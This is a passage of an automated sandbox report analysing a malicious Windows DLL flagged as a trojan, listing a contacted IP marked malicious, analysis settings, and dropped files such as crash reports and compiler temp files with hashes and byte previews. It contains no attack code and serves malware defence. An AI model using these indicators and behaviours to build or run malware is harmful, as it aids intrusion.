                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      146.70.35.138
                      		unknownUnited Kingdom
                      		2018TENET-1ZAtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:614287
                      Start date and time: 23/04/202208:10:432022-04-23 08:10:43 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 16s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:VoevdOQpeU.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:43
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@29/23@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21% (good quality ratio 19.9%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:11:55API Interceptor1x Sleep call for process: rundll32.exe modified
                      08:12:10API Interceptor2x Sleep call for process: WerFault.exe modified
                      08:12:34API Interceptor41x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_164b3f26\Report.wer

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8484271078729315
                      Encrypted:false
                      SSDEEP:96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW
                      MD5:AC7F4345BC16B046B4BD7A4B49FAD9DE
                      SHA1:31DB96A77E8C9352345D2D35BDD922C5A989733E
                      SHA-256:0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A
                      SHA-512:F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6
                      Malicious:false
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.6.8.6.4.1.0.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.9.5.6.7.2.1.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.2.4.1.b.1.9.-.9.c.1.3.-.4.6.3.b.-.a.9.b.d.-.4.a.9.5.3.6.d.5.a.3.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.2.f.1.2.6.9.-.a.2.3.4.-.4.9.c.1.-.a.a.e.4.-.4.e.4.1.7.5.a.d.7.b.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5f68951fc85ec886a9cff2e6302d69913a8368e_7cac0383_107353c7\Report.wer

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8450263074663521
                      Encrypted:false
                      SSDEEP:96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW
                      MD5:E3453784F5987FFC4297D68B3E5806EC
                      SHA1:8AE5D7F0D9E1EDD426FD57793895BF06C7D55090
                      SHA-256:A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC
                      SHA-512:FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8
                      Malicious:false
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.3.6.0.5.9.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.5.3.0.9.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.6.8.f.e.a.e.-.1.3.e.b.-.4.b.8.7.-.a.8.a.d.-.3.5.e.c.1.a.c.8.a.3.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.4.9.d.4.4.c.-.a.8.3.4.-.4.9.8.a.-.b.a.8.2.-.c.3.d.a.4.5.4.7.f.4.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmp.dmp

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:08 2022, 0x1205a4 type
                      Category:dropped
                      Size (bytes):39506
                      Entropy (8bit):2.072438553320638
                      Encrypted:false
                      SSDEEP:192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK
                      MD5:C917F1742DC83F5A043197F2F54A0C4E
                      SHA1:AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF
                      SHA-256:142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889
                      SHA-512:61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6
                      Malicious:false
                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T...............j............................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER36F9.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8340
                      Entropy (8bit):3.69846117157985
                      Encrypted:false
                      SSDEEP:192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy
                      MD5:03FE517493CDA2DA9A9CB5CF3B51E3C8
                      SHA1:6DAA111381E6A2BA15D14F385ECD9EE1E680EE70
                      SHA-256:088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988
                      SHA-512:2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3890.tmp.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4598
                      Entropy (8bit):4.468439994201981
                      Encrypted:false
                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd
                      MD5:1F581D2D671323001820EEC345955E8D
                      SHA1:84D57DE07A1A92920A775FD9A2EF441FD6D55EDC
                      SHA-256:F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1
                      SHA-512:E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER49A5.tmp.dmp

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:14 2022, 0x1205a4 type
                      Category:dropped
                      Size (bytes):36062
                      Entropy (8bit):1.9519178024623962
                      Encrypted:false
                      SSDEEP:192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX
                      MD5:B26D761700EC27A85A7E8306F7D9C1CD
                      SHA1:26BA946FC504E3B720545A54C6166E6A2841B1FC
                      SHA-256:A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72
                      SHA-512:3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3
                      Malicious:false
                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T................t...........................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D5F.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8300
                      Entropy (8bit):3.69036741286865
                      Encrypted:false
                      SSDEEP:192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe
                      MD5:C80DFEB2FD09E96D80A105BF1416186F
                      SHA1:C2E029A858E8ED96BB46CEB163704C526428BB15
                      SHA-256:B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F
                      SHA-512:785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EB8.tmp.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4564
                      Entropy (8bit):4.439548228059502
                      Encrypted:false
                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd
                      MD5:DF03F167543BFE5B6CDEF17CD6CDB700
                      SHA1:6BBC61B7DBF6EB32A530D87A971944CDD312120D
                      SHA-256:84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80
                      SHA-512:504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):11606
                      Entropy (8bit):4.8910535897909355
                      Encrypted:false
                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                      MD5:F84F6C99316F038F964F3A6DB900038F
                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                      Malicious:false
                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                      C:\Users\user\AppData\Local\Temp\RES2392.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.985489714311352
                      Encrypted:false
                      SSDEEP:24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K
                      MD5:67C978F8F6E761129B658BABBAC2C0E3
                      SHA1:02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A
                      SHA-256:9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A
                      SHA-512:78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD
                      Malicious:false
                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP.................a.....-...`.~............4.......C:\Users\user\AppData\Local\Temp\RES2392.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                      C:\Users\user\AppData\Local\Temp\RES3B60.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.965326095070505
                      Encrypted:false
                      SSDEEP:24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K
                      MD5:E34239A621ECB61A5F50016AE522485A
                      SHA1:EDD24063A2BC018FA0F98951A747630C5925D5FE
                      SHA-256:E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E
                      SHA-512:5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1
                      Malicious:false
                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP.................sf.]..E`W`..<............4.......C:\Users\user\AppData\Local\Temp\RES3B60.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4tlk4n5.iwk.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldp1b5en.1s3.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0806512987018424
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX
                      MD5:8C7366A75D058E4560576098B53C2E89
